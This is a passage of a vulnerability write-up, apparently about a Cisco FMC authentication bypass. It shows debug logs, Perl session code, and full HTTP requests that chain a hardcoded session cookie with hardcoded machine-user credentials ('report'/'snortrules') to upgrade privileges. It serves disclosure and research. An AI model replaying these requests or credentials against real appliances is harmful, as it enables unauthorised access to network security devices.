looks to be as easy as using a hardcoded session. Now we can just set our cookie to that value and try and reach any of the pages.... 
and every page functionally triggers the following error:",[184,3658,3659],{},[187,3660],{"alt":3661,"src":3662},"Authentication failing on most pages.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fui-failure.png",[246,3664,3666],{"id":3665},"its-never-that-easy","It's Never That Easy",[184,3668,3669],{},"Using the hardcoded session and reaching for any of the endpoints triggers errors in the log similar to the following:",[1449,3671,3674],{"className":3672,"code":3673,"language":1454},[1452],"[2026-03-25 19:41:00.32860] [14601] [debug] 200 OK (2.203898s, 0.454\u002Fs)\n[2026-03-25 19:41:00.32865] [14601] [debug] after dispatch worker inspection\n[2026-03-25 19:41:46.03099] [14601] [debug] Resetting modules...\n[2026-03-25 19:41:46.03807] [14601] [debug] Module reset complete\n[2026-03-25 19:41:46.03828] [14601] [debug] GET \"\u002Fplatinum\u002FApplianceInformation.cgi\" (27828f1b)\n[2026-03-25 19:41:46.03841] [14601] [debug] Routing to controller \"SF::Mojo::Handlers::ApplianceInformationHandler\" and action \"mojo_handler\"\n[2026-03-25 19:41:46.03895] [14601] [info] handle_auth: Trying to connect to \u002Fplatinum\u002FApplianceInformation.cgi\n[2026-03-25 19:41:46.04650] [14601] [info] User [csm_processes] does not have page permission [configuration]. Access denied. 
at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 3268.\n[2026-03-25 19:41:46.04675] [14601] [info] Unauthorized access to \u002Fplatinum\u002FApplianceInformation.cgi\n        called from SF::Util::Stacktrace::ToString at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 119\n        called from SF::Mojo::CommonUtils::Unauthorized at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 266\n        called from SF::Mojo::CommonUtils::handle_auth at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FHandlers\u002FApplianceInformationHandler.pm, line 19\n...snip...\n        called from Mojo::Server::Prefork::_spawn at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 100\n        called from Mojo::Server::Prefork::_manage at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 85\n        called from Mojo::Server::Prefork::run at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FHypnotoad.pm, line 74\n        called from Mojo::Server::Hypnotoad::run at \u002Fusr\u002Flocal\u002Fsf\u002Fbin\u002Fmojo_server_wrapper.pl, line 38\n[2026-03-25 19:41:46.04803] [14601] [info] Use of uninitialized value $key in concatenation (.) or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:46.04806] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04822] [14601] [info] Use of uninitialized value $key in concatenation (.) 
or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04829] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.21809] [14601] [info] Use of uninitialized value in string eq at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAmplitude.pm line 40.\n[2026-03-25 19:41:48.22680] [14601] [debug] 200 OK (2.188507s, 0.457\u002Fs)\n[2026-03-25 19:41:48.22691] [14601] [debug] after dispatch worker inspection\n",[1277,3675,3673],{"__ignoreMap":148},[184,3677,3678],{},"As it turns out, nearly every CGI page of the application contains a snippet similar to the following:",[1449,3680,3682],{"className":1465,"code":3681,"language":1467,"meta":148,"style":148},"use SF::Auth;\nmy $session = SF::Auth::GetSession($cgi);\nSF::Auth::CheckLogin($cgi, $session);\n",[1277,3683,3684,3691,3706],{"__ignoreMap":148},[1471,3685,3686,3688],{"class":1473,"line":1474},[1471,3687,1834],{"class":1483},[1471,3689,3690],{"class":1487}," SF::Auth;\n",[1471,3692,3693,3696,3698,3701,3703],{"class":1473,"line":149},[1471,3694,3695],{"class":1501},"my",[1471,3697,1505],{"class":1491},[1471,3699,3700],{"class":1487},"session = SF::Auth::GetSession(",[1471,3702,1492],{"class":1491},[1471,3704,3705],{"class":1487},"cgi);\n",[1471,3707,3708,3711,3713,3716,3718],{"class":1473,"line":1498},[1471,3709,3710],{"class":1487},"SF::Auth::CheckLogin(",[1471,3712,1492],{"class":1491},[1471,3714,3715],{"class":1487},"cgi, ",[1471,3717,1492],{"class":1491},[1471,3719,1802],{"class":1487},[184,3721,3722,3723,3726,3727,3730,3731,3734,3735,3738,3739,3741,3742,3745],{},"Internally to the application, the current session username is cross-referenced with the permission logic ",[1277,3724,3725],{},"Permission.pm"," module, and uses the permissions assigned to the user for 
whenever ",[1277,3728,3729],{},"CheckLogin"," is run. This means we can pass the basic authentication check for any page that only uses ",[1277,3732,3733],{},"SF::Auth::GetSession",", but any calls to ",[1277,3736,3737],{},"SF::Auth::CheckLogin"," or a direct permission check will depend on the permissions of the user. Well, what permissions does our ",[1277,3740,1279],{}," user have? None. It turns out the machine user does ",[1374,3743,3744],{},"not"," have any permissions assigned, and we are functionally restricted to the lowest-privileged user account.",[184,3747,3748],{},"This immediately presented a huge problem, as we generally could not interact with any of the APIs or CGI scripts (with very few exceptions). We began checking the authentication logic for a few sets of entry points, testing as many as we could find and cross-referencing what a normal admin UI user would be able to interact with.",[184,3750,3751,3752,3755],{},"Testing showed that we only had access to a small handful of API calls that checked session validity, a few CGI scripts, and not a single one of the ",[1277,3753,3754],{},"\u002Fapi"," routes in Apache. 
We got stuck here for quite a while attempting to find what we could access with our minimally privileged user, as the words \"successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device\" echoed in our heads.",[184,3757,3758,3759,3761,3762,3764],{},"Our UI login testing and cross-referencing with the ",[1277,3760,1279],{}," session showed a couple of exceptions to the ",[1277,3763,3729],{}," logic that stood out:",[227,3766,3767,3780],{},[230,3768,1292,3769,3771,3772,3775,3776,3779],{},[1277,3770,1329],{}," script that appears to be used for bulk API requests does not directly check logins, only sessions; but then it cross-references the permissions that are callable with a set of permission maps to functions defined in ",[1277,3773,3774],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FPJB.pm",". This includes a special ",[1277,3777,3778],{},"all"," permission.",[230,3781,1292,3782,3785,3786,3789],{},[1277,3783,3784],{},"sajaxintf.cgi"," script handles async AJAX requests; it has a set of functions that any user appears to be able to call, and that correlate to functions defined in ",[1277,3787,3788],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," that individually appear to perform most of their logic.",[184,3791,3792,3793,3795,3796,3799],{},"Great, those sound like perfect candidates, but both of these APIs have odd interfaces. For ",[1277,3794,3784],{},", requests are sent as a JSON array, and the ordered arguments correlate to the application functions and their arguments. The following call sends a request to the ",[1277,3797,3798],{},"batchResults"," function. 
All the following parameters are arguments for that function:",[1449,3801,3803],{"className":3138,"code":3802,"language":3140,"meta":148,"style":148},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 143\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n[\"a490cd6e67ccde81d131684846d7a13c\",\"batchResults\",null,10000,\"getRulesForCategory\",\"policy_modifications\",\"\",\"\",\"Category::browser-chrome\",\"\"]\n",[1277,3804,3805,3819,3827,3836,3845,3855,3864,3872,3882,3890,3894],{"__ignoreMap":148},[1471,3806,3807,3810,3813,3815,3817],{"class":1473,"line":1474},[1471,3808,3809],{"class":1483},"POST",[1471,3811,3812],{"class":1487}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 ",[1471,3814,3153],{"class":2247},[1471,3816,55],{"class":1487},[1471,3818,3158],{"class":2328},[1471,3820,3821,3823,3825],{"class":1473,"line":149},[1471,3822,3164],{"class":3163},[1471,3824,1447],{"class":2247},[1471,3826,3169],{"class":1527},[1471,3828,3829,3831,3833],{"class":1473,"line":1498},[1471,3830,3428],{"class":3163},[1471,3832,1447],{"class":2247},[1471,3834,3835],{"class":1527}," CGISESSID=199ceac425aaa91610edd959ce049568\n",[1471,3837,3838,3840,3842],{"class":1473,"line":1536},[1471,3839,3274],{"class":3163},[1471,3841,1447],{"class":2247},[1471,3843,3844],{"class":1527}," 143\n",[1471,3846,3847,3850,3852],{"class":1473,"line":1546},[1471,3848,3849],{"class":3163},"Accept-Language",[1471,3851,1447],{"class":2247},[1471,3853,3854],{"class":1527}," en-US,en;q=0.9\n",[1471,3856,3857,3859,3861],{"class":1473,"line":1580},[1471,3858,3254],{"class":3163},[1471,3860,1447],{"class":2247},[1471,3862,3863],{"class":1527}," 
application\u002Fjson\n",[1471,3865,3866,3868,3870],{"class":1473,"line":1612},[1471,3867,3174],{"class":3163},[1471,3869,1447],{"class":2247},[1471,3871,3179],{"class":1527},[1471,3873,3874,3877,3879],{"class":1473,"line":1624},[1471,3875,3876],{"class":3163},"Accept",[1471,3878,1447],{"class":2247},[1471,3880,3881],{"class":1527}," *\u002F*\n",[1471,3883,3884,3886,3888],{"class":1473,"line":1648},[1471,3885,3194],{"class":3163},[1471,3887,1447],{"class":2247},[1471,3889,3199],{"class":1527},[1471,3891,3892],{"class":1473,"line":1654},[1471,3893,3383],{"emptyLinePlaceholder":54},[1471,3895,3896,3899,3901,3903,3905,3907,3909,3911,3913,3915,3919,3921,3924,3926,3928,3931,3933,3935,3937,3940,3942,3944,3947,3949,3951,3953,3955,3958,3960,3962,3964],{"class":1473,"line":1662},[1471,3897,3898],{"class":1491},"[",[1471,3900,1767],{"class":1523},[1471,3902,2594],{"class":1527},[1471,3904,1767],{"class":1523},[1471,3906,2298],{"class":1491},[1471,3908,1767],{"class":1523},[1471,3910,3798],{"class":1527},[1471,3912,1767],{"class":1523},[1471,3914,2298],{"class":1491},[1471,3916,3918],{"class":3917},"sMTiH","null",[1471,3920,2298],{"class":1491},[1471,3922,3923],{"class":2328},"10000",[1471,3925,2298],{"class":1491},[1471,3927,1767],{"class":1523},[1471,3929,3930],{"class":1527},"getRulesForCategory",[1471,3932,1767],{"class":1523},[1471,3934,2298],{"class":1491},[1471,3936,1767],{"class":1523},[1471,3938,3939],{"class":1527},"policy_modifications",[1471,3941,1767],{"class":1523},[1471,3943,2298],{"class":1491},[1471,3945,3946],{"class":1523},"\"\"",[1471,3948,2298],{"class":1491},[1471,3950,3946],{"class":1523},[1471,3952,2298],{"class":1491},[1471,3954,1767],{"class":1523},[1471,3956,3957],{"class":1527},"Category::browser-chrome",[1471,3959,1767],{"class":1523},[1471,3961,2298],{"class":1491},[1471,3963,3946],{"class":1523},[1471,3965,3966],{"class":1491},"]\n",[184,3968,3969,3970,3972,3973,3976,3977,3980,3981,3984,3985,3988],{},"Meanwhile, the ",[1277,3971,1329],{}," 
script has a similar interface, but instead uses form value fields and a ",[1277,3974,3975],{},"parameter"," field that contains the JSON array field that corresponds to a Perl object. In the following example the ",[1277,3978,3979],{},"SF::IdentityPolicy::IdentityPolicy::getPolicyList"," function is called and ",[1277,3982,3983],{},"parameters"," is an encoded empty JSON array (",[1277,3986,3987],{},"[]",") indicating no arguments are passed:",[1449,3990,3992],{"className":3138,"code":3991,"language":3140,"meta":148,"style":148},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 177\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n&function=SF::IdentityPolicy::IdentityPolicy::getPolicyList&parameters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[1277,3993,3994,4007,4015,4023,4032,4040,4049,4057,4065,4073,4077],{"__ignoreMap":148},[1471,3995,3996,3998,4001,4003,4005],{"class":1473,"line":1474},[1471,3997,3809],{"class":1483},[1471,3999,4000],{"class":1487}," \u002Fpjb.cgi ",[1471,4002,3153],{"class":2247},[1471,4004,55],{"class":1487},[1471,4006,3158],{"class":2328},[1471,4008,4009,4011,4013],{"class":1473,"line":149},[1471,4010,3164],{"class":3163},[1471,4012,1447],{"class":2247},[1471,4014,3169],{"class":1527},[1471,4016,4017,4019,4021],{"class":1473,"line":1498},[1471,4018,3428],{"class":3163},[1471,4020,1447],{"class":2247},[1471,4022,3835],{"class":1527},[1471,4024,4025,4027,4029],{"class":1473,"line":1536},[1471,4026,3274],{"class":3163},[1471,4028,1447],{"class":2247},[1471,4030,4031],{"class":1527}," 
177\n",[1471,4033,4034,4036,4038],{"class":1473,"line":1546},[1471,4035,3849],{"class":3163},[1471,4037,1447],{"class":2247},[1471,4039,3854],{"class":1527},[1471,4041,4042,4044,4046],{"class":1473,"line":1580},[1471,4043,3254],{"class":3163},[1471,4045,1447],{"class":2247},[1471,4047,4048],{"class":1527}," application\u002Fx-www-form-urlencoded\n",[1471,4050,4051,4053,4055],{"class":1473,"line":1612},[1471,4052,3174],{"class":3163},[1471,4054,1447],{"class":2247},[1471,4056,3179],{"class":1527},[1471,4058,4059,4061,4063],{"class":1473,"line":1624},[1471,4060,3876],{"class":3163},[1471,4062,1447],{"class":2247},[1471,4064,3881],{"class":1527},[1471,4066,4067,4069,4071],{"class":1473,"line":1648},[1471,4068,3194],{"class":3163},[1471,4070,1447],{"class":2247},[1471,4072,3199],{"class":1527},[1471,4074,4075],{"class":1473,"line":1654},[1471,4076,3383],{"emptyLinePlaceholder":54},[1471,4078,4079,4082,4085],{"class":1473,"line":1662},[1471,4080,4081],{"class":1516},"&",[1471,4083,4084],{"class":1487},"function=",[1471,4086,4087],{"class":1527},"SF::IdentityPolicy::IdentityPolicy::getPolicyList&parameters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[184,4089,4090,4091,4093,4094,4096,4097,4099,4100,4102,4103,4105,4106,4108],{},"As you may have noticed, both requests contain the value ",[1277,4092,2594],{},", the first in the first array parameter and the second in the ",[1277,4095,1306],{}," parameter. This is where the next hurdle comes into play, because this value acts as a CSRF token that is tied to user sessions. Looking at the original startup-created session SQL response, we see that the ",[1277,4098,2663],{}," user session has the ",[1277,4101,1306],{}," value set, and the ",[1277,4104,1279],{}," session does not. 
This means that if we make a request to those endpoints, we will not be able to pass any of the basic validation checks, because that session does not have the ",[1277,4107,1306],{}," value set. As a result, none of the functions in these applications can be called, and almost all API calls fail uniformly. The token values also correlate directly to the session value, so they are not reusable between user sessions.",[184,4110,4111,4112,4114],{},"We need to get a ",[1277,4113,1306],{}," or a permission upgrade to be able to do anything functional beyond version checking.",[246,4116,4118],{"id":4117},"session-upgrade","Session Upgrade",[184,4120,4121,4122,4125,4126,4128,4129,4131,4132,4134,4135,4138],{},"Our first thought was to look at all the session value manipulations and any interactions with permissions, which turned out to be a dead end: in our testing, there were almost no session manipulations that could occur unauthenticated. Our second idea was to look at other APIs and reverse ",[1277,4123,4124],{},"auth-daemon"," for any interactions. Midway through that long process and many failed sinks, something occurred to me. The ",[1277,4127,1279],{}," session value isn't inherently tied to the ",[1277,4130,1279],{}," authentication. 
According to the ",[1277,4133,1823],{}," code, an authentication to the login page would happily take an existing session value and make a new session for the user — ",[1374,4136,4137],{},"and"," it would happily initialize a set of options on the existing session:",[1449,4140,4142],{"className":1465,"code":4141,"language":1467,"meta":148,"style":148},"my $authing = 0;\nsub GetSession {\n    my ($q, $silent) = @_;\n    #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n\n    # Return the cached session if we have one\n    return $_SESSION if (defined $_SESSION);\n\n    $q = new SF if !defined $q;\n\n    # If they were fishing for a cached session but there isn't one, return no session\n    my $sid;\n    if (ref($q) eq 'Mojo::Message::Request') {\n        $sid = find_session_id_from_cookies($q->cookies);\n    } else {\n        # Get the session ID from the cookie\n        $sid = $q->cookie($CGI::Session::NAME);\n    }\n    return undef if !defined $sid;\n\n    # Initialize sfclient\n    return undef if (sfclient::sfclient_Init() != 0);\n\n    # Cache the session and return it\n    $_SESSION = MakeSession($sid, $silent);\n    if (ref($q) eq 'Mojo::Message::Request') {\n        $CURRENT_REQ_URL = $q->url->path->to_string;\n        $CURRENT_REQ_METHOD = $q->method;\n        setCurrentReqParams($q->params->to_hash);\n    }\n    else {\n        $CURRENT_REQ_URL = $q->url( -absolute => 1);\n        $CURRENT_REQ_METHOD = $q->request_method;\n        setCurrentReqParams(scalar $q->Vars());\n    }\n    return $_SESSION;\n}\n",[1277,4143,4144,4153,4165,4186,4191,4195,4200,4218,4222,4242,4246,4251,4260,4284,4300,4308,4313,4334,4338,4356,4360,4365,4382,4386,4391,4407,4432,4459,4476,4496,4501,4509,4533,4549,4570,4575,4583],{"__ignoreMap":148},[1471,4145,4146,4148,4150],{"class":1473,"line":1474},[1471,4147,3695],{"class":1501},[1471,4149,1505],{"class":1491},[1471,4151,4152],{"class":1487},"authing = 
0;\n",[1471,4154,4155,4159,4163],{"class":1473,"line":149},[1471,4156,4158],{"class":4157},"srJo8","sub",[1471,4160,4162],{"class":4161},"sD0ED"," GetSession",[1471,4164,1621],{"class":1487},[1471,4166,4167,4169,4171,4173,4175,4177,4180,4183],{"class":1473,"line":1498},[1471,4168,1502],{"class":1501},[1471,4170,1488],{"class":1487},[1471,4172,1492],{"class":1491},[1471,4174,1797],{"class":1487},[1471,4176,1492],{"class":1491},[1471,4178,4179],{"class":1487},"silent) = ",[1471,4181,4182],{"class":1491},"@",[1471,4184,4185],{"class":1487},"_;\n",[1471,4187,4188],{"class":1473,"line":1536},[1471,4189,4190],{"class":1477},"    #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n",[1471,4192,4193],{"class":1473,"line":1546},[1471,4194,3383],{"emptyLinePlaceholder":54},[1471,4196,4197],{"class":1473,"line":1580},[1471,4198,4199],{"class":1477},"    # Return the cached session if we have one\n",[1471,4201,4202,4205,4208,4210,4212,4215],{"class":1473,"line":1612},[1471,4203,4204],{"class":1483},"    return",[1471,4206,4207],{"class":1487}," $_SESSION ",[1471,4209,1484],{"class":1483},[1471,4211,1488],{"class":1487},[1471,4213,4214],{"class":1554},"defined",[1471,4216,4217],{"class":1487}," $_SESSION);\n",[1471,4219,4220],{"class":1473,"line":1624},[1471,4221,3383],{"emptyLinePlaceholder":54},[1471,4223,4224,4227,4230,4232,4235,4237,4239],{"class":1473,"line":1648},[1471,4225,4226],{"class":1491},"    $",[1471,4228,4229],{"class":1487},"q = new SF ",[1471,4231,1484],{"class":1483},[1471,4233,4234],{"class":1487}," !",[1471,4236,4214],{"class":1554},[1471,4238,1505],{"class":1491},[1471,4240,4241],{"class":1487},"q;\n",[1471,4243,4244],{"class":1473,"line":1654},[1471,4245,3383],{"emptyLinePlaceholder":54},[1471,4247,4248],{"class":1473,"line":1662},[1471,4249,4250],{"class":1477},"    # If they were fishing for a cached session but there isn't one, return no 
session\n",[1471,4252,4253,4255,4257],{"class":1473,"line":1673},[1471,4254,1502],{"class":1501},[1471,4256,1505],{"class":1491},[1471,4258,4259],{"class":1487},"sid;\n",[1471,4261,4262,4264,4266,4268,4270,4272,4274,4276,4278,4280,4282],{"class":1473,"line":1681},[1471,4263,1549],{"class":1483},[1471,4265,1488],{"class":1487},[1471,4267,1555],{"class":1554},[1471,4269,1558],{"class":1487},[1471,4271,1492],{"class":1491},[1471,4273,1563],{"class":1487},[1471,4275,1566],{"class":1554},[1471,4277,1569],{"class":1523},[1471,4279,1572],{"class":1527},[1471,4281,1524],{"class":1523},[1471,4283,1577],{"class":1487},[1471,4285,4286,4288,4291,4293,4295,4297],{"class":1473,"line":1691},[1471,4287,1583],{"class":1491},[1471,4289,4290],{"class":1487},"sid = find_session_id_from_cookies(",[1471,4292,1492],{"class":1491},[1471,4294,1591],{"class":1487},[1471,4296,1517],{"class":1516},[1471,4298,4299],{"class":1487},"cookies);\n",[1471,4301,4302,4304,4306],{"class":1473,"line":1699},[1471,4303,1615],{"class":1487},[1471,4305,1618],{"class":1483},[1471,4307,1621],{"class":1487},[1471,4309,4310],{"class":1473,"line":1705},[1471,4311,4312],{"class":1477},"        # Get the session ID from the cookie\n",[1471,4314,4315,4317,4320,4322,4324,4326,4329,4331],{"class":1473,"line":1733},[1471,4316,1583],{"class":1491},[1471,4318,4319],{"class":1487},"sid = ",[1471,4321,1492],{"class":1491},[1471,4323,1591],{"class":1487},[1471,4325,1517],{"class":1516},[1471,4327,4328],{"class":1487},"cookie(",[1471,4330,1492],{"class":1491},[1471,4332,4333],{"class":1487},"CGI::Session::NAME);\n",[1471,4335,4336],{"class":1473,"line":1773},[1471,4337,1651],{"class":1487},[1471,4339,4340,4342,4345,4348,4350,4352,4354],{"class":1473,"line":1789},[1471,4341,4204],{"class":1483},[1471,4343,4344],{"class":1554}," undef",[1471,4346,4347],{"class":1483}," 
if",[1471,4349,4234],{"class":1487},[1471,4351,4214],{"class":1554},[1471,4353,1505],{"class":1491},[1471,4355,4259],{"class":1487},[1471,4357,4358],{"class":1473,"line":1805},[1471,4359,3383],{"emptyLinePlaceholder":54},[1471,4361,4362],{"class":1473,"line":50},[1471,4363,4364],{"class":1477},"    # Initialize sfclient\n",[1471,4366,4367,4369,4371,4373,4376,4379],{"class":1473,"line":3639},[1471,4368,4204],{"class":1483},[1471,4370,4344],{"class":1554},[1471,4372,4347],{"class":1483},[1471,4374,4375],{"class":1487}," (sfclient::sfclient_Init",[1471,4377,4378],{"class":1491},"()",[1471,4380,4381],{"class":1487}," != 0);\n",[1471,4383,4384],{"class":1473,"line":3644},[1471,4385,3383],{"emptyLinePlaceholder":54},[1471,4387,4388],{"class":1473,"line":45},[1471,4389,4390],{"class":1477},"    # Cache the session and return it\n",[1471,4392,4394,4397,4399,4402,4404],{"class":1473,"line":4393},25,[1471,4395,4396],{"class":1487},"    $_SESSION = MakeSession(",[1471,4398,1492],{"class":1491},[1471,4400,4401],{"class":1487},"sid, ",[1471,4403,1492],{"class":1491},[1471,4405,4406],{"class":1487},"silent);\n",[1471,4408,4410,4412,4414,4416,4418,4420,4422,4424,4426,4428,4430],{"class":1473,"line":4409},26,[1471,4411,1549],{"class":1483},[1471,4413,1488],{"class":1487},[1471,4415,1555],{"class":1554},[1471,4417,1558],{"class":1487},[1471,4419,1492],{"class":1491},[1471,4421,1563],{"class":1487},[1471,4423,1566],{"class":1554},[1471,4425,1569],{"class":1523},[1471,4427,1572],{"class":1527},[1471,4429,1524],{"class":1523},[1471,4431,1577],{"class":1487},[1471,4433,4435,4437,4440,4442,4444,4446,4449,4451,4454,4456],{"class":1473,"line":4434},27,[1471,4436,1583],{"class":1491},[1471,4438,4439],{"class":1487},"CURRENT_REQ_URL = 
",[1471,4441,1492],{"class":1491},[1471,4443,1591],{"class":1487},[1471,4445,1517],{"class":1516},[1471,4447,4448],{"class":1487},"url",[1471,4450,1517],{"class":1516},[1471,4452,4453],{"class":1487},"path",[1471,4455,1517],{"class":1516},[1471,4457,4458],{"class":1487},"to_string;\n",[1471,4460,4462,4464,4467,4469,4471,4473],{"class":1473,"line":4461},28,[1471,4463,1583],{"class":1491},[1471,4465,4466],{"class":1487},"CURRENT_REQ_METHOD = ",[1471,4468,1492],{"class":1491},[1471,4470,1591],{"class":1487},[1471,4472,1517],{"class":1516},[1471,4474,4475],{"class":1487},"method;\n",[1471,4477,4479,4482,4484,4486,4488,4491,4493],{"class":1473,"line":4478},29,[1471,4480,4481],{"class":1487},"        setCurrentReqParams(",[1471,4483,1492],{"class":1491},[1471,4485,1591],{"class":1487},[1471,4487,1517],{"class":1516},[1471,4489,4490],{"class":1487},"params",[1471,4492,1517],{"class":1516},[1471,4494,4495],{"class":1487},"to_hash);\n",[1471,4497,4499],{"class":1473,"line":4498},30,[1471,4500,1651],{"class":1487},[1471,4502,4504,4507],{"class":1473,"line":4503},31,[1471,4505,4506],{"class":1483},"    else",[1471,4508,1621],{"class":1487},[1471,4510,4512,4514,4516,4518,4520,4522,4525,4528,4530],{"class":1473,"line":4511},32,[1471,4513,1583],{"class":1491},[1471,4515,4439],{"class":1487},[1471,4517,1492],{"class":1491},[1471,4519,1591],{"class":1487},[1471,4521,1517],{"class":1516},[1471,4523,4524],{"class":1487},"url( -",[1471,4526,4527],{"class":1840},"absolute",[1471,4529,1844],{"class":1516},[1471,4531,4532],{"class":1487}," 
1);\n",[1471,4534,4536,4538,4540,4542,4544,4546],{"class":1473,"line":4535},33,[1471,4537,1583],{"class":1491},[1471,4539,4466],{"class":1487},[1471,4541,1492],{"class":1491},[1471,4543,1591],{"class":1487},[1471,4545,1517],{"class":1516},[1471,4547,4548],{"class":1487},"request_method;\n",[1471,4550,4552,4554,4557,4559,4561,4563,4566,4568],{"class":1473,"line":4551},34,[1471,4553,4481],{"class":1487},[1471,4555,4556],{"class":1554},"scalar",[1471,4558,1505],{"class":1491},[1471,4560,1591],{"class":1487},[1471,4562,1517],{"class":1516},[1471,4564,4565],{"class":1487},"Vars",[1471,4567,4378],{"class":1491},[1471,4569,1533],{"class":1487},[1471,4571,4573],{"class":1473,"line":4572},35,[1471,4574,1651],{"class":1487},[1471,4576,4578,4580],{"class":1473,"line":4577},36,[1471,4579,4204],{"class":1483},[1471,4581,4582],{"class":1487}," $_SESSION;\n",[1471,4584,4586],{"class":1473,"line":4585},37,[1471,4587,1812],{"class":1487},[184,4589,4590,4591,4593,4594,4597],{},"The biggest issue was very much a chicken and egg problem: We needed credentials to be able to upgrade a session. Then while staring at the authentication code for the hundredth time, it occurred to me: The current session checks that are applied to the ",[1277,4592,1279],{}," session have the variables necessary for UI authentication. 
Attempting to use the hardcoded ",[1277,4595,4596],{},"csm_processes:csmdaemon"," credentials to log in, unfortunately, causes the session to immediately expire (as is stated in the session information), and the boot session is entirely removed, locking us out of the attack path.",[184,4599,4600,4601,4603,4604,4607,4608,4610],{},"But, there's no reason that the ",[1277,4602,1279],{}," session ID couldn't be upgraded by a ",[1374,4605,4606],{},"different"," machine user, and because the values are set to be able to pass UI authentication, all we had to do was take one of the hardcoded credentials that was not the ",[1277,4609,1279],{}," user and authentication would be happy even if it's a non-UI machine user.",[184,4612,4613,4614,4616,4617,4619,4620,4623,4624,4626],{},"Sure enough, we could authenticate with ",[1277,4615,1310],{}," credentials with the ",[1277,4618,3127],{}," session set, after which the ",[1277,4621,4622],{},"MakeSession"," function is called as the ",[1277,4625,1920],{}," user, the checks validate the machine user as a UI user, and the session values are updated.",[1449,4628,4630],{"className":3138,"code":4629,"language":3140,"meta":148,"style":148},"POST \u002Flogin.cgi?logon=Continue HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes;\nContent-Length: 43\nAccept-Language: en-US,en;q=0.9\nOrigin: https:\u002F\u002F10.0.0.226\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nConnection: 
keep-alive\n\nusername=report&password=snortrules&target=\n",[1277,4631,4632,4645,4653,4662,4671,4679,4689,4697,4705,4714,4722,4726],{"__ignoreMap":148},[1471,4633,4634,4636,4639,4641,4643],{"class":1473,"line":1474},[1471,4635,3809],{"class":1483},[1471,4637,4638],{"class":1487}," \u002Flogin.cgi?logon=Continue ",[1471,4640,3153],{"class":2247},[1471,4642,55],{"class":1487},[1471,4644,3158],{"class":2328},[1471,4646,4647,4649,4651],{"class":1473,"line":149},[1471,4648,3164],{"class":3163},[1471,4650,1447],{"class":2247},[1471,4652,3169],{"class":1527},[1471,4654,4655,4657,4659],{"class":1473,"line":1498},[1471,4656,3428],{"class":3163},[1471,4658,1447],{"class":2247},[1471,4660,4661],{"class":1527}," CGISESSID=csm_processes;\n",[1471,4663,4664,4666,4668],{"class":1473,"line":1536},[1471,4665,3274],{"class":3163},[1471,4667,1447],{"class":2247},[1471,4669,4670],{"class":1527}," 